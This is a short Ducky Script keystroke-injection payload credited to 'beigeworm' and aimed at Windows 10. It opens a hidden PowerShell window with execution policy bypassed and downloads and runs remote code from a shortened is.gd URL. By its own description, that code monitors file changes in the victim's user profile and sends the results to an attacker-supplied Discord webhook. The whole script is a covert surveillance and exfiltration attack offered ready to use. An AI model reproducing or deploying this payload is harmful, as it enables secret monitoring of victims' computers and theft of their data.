
REM Title: beigeworm's monitor file changes to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex
ENTER


